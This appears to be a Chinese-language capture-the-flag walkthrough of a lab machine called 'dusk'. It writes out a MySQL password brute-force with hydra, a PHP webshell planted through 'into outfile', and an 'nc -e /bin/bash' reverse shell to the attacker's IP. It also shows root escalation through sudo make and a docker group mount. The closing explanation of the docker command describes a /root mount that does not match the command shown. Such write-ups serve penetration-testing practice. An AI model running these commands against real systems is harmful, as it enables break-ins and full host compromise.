dusk
信息搜集
存活检测
详细扫描
扫描出以下开放端口
后台网页扫描
网页信息搜集
查看开放的 8080 端口
可知工作路径在 /var/tmp 下
继续进行信息搜集,未发现有用信息
反弹 shell
尝试爆破数据库
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.4.7.158:3306
成功爆破出密码 password
数据库登录
查看MySQL服务器的安全相关的配置变量
show variables like '%secure%';
secure_file_priv为空,可以读取磁盘的目录。
向目录 /var/tmp 下写入一句话木马
select "<?php system($_GET['cmd']);?>" into outfile "/var/tmp/backdoor.php";
写入的 php 文件可以成功访问
kali 开启 nc 监听
url 输入连接命令
http://10.4.7.158:8080/backdoor.php?cmd=nc -e /bin/bash 10.4.7.146 8888
成功反弹
提权
sudo -l
查看 root 权限
dusk 用户可以无密码使用 sudo make
make 提权命令
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
成功提权到 dusk
发现 duck 在 docker 组内
提权
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
成功提权
将文件夹挂载到mnt文件夹
在容器中运行 Alpine 镜像,并将主机的
/root
目录挂载到容器的/mnt
目录。具体来说,命令的各个部分的含义如下:
docker run
:运行一个 Docker 容器。
-it
:创建一个交互式的终端会话,并分配一个伪终端。
-v /root:/mnt
:将主机的/root
目录挂载到容器的/mnt
目录。容器中的
/mnt
目录将显示主机中/root
目录的内容,并且对/mnt
目录的更改将反映在主机的/root
目录中。
alpine
:指定要运行的容器镜像,这里是 Alpine 镜像。alpine 容器提供了一个基于 Alpine Linux 的最小化运行环境
通过这个命令,可以在 Alpine 容器中访问和操作主机上的
/root
目录中的文件和目录。
总结
- 数据库写入
- docker 提权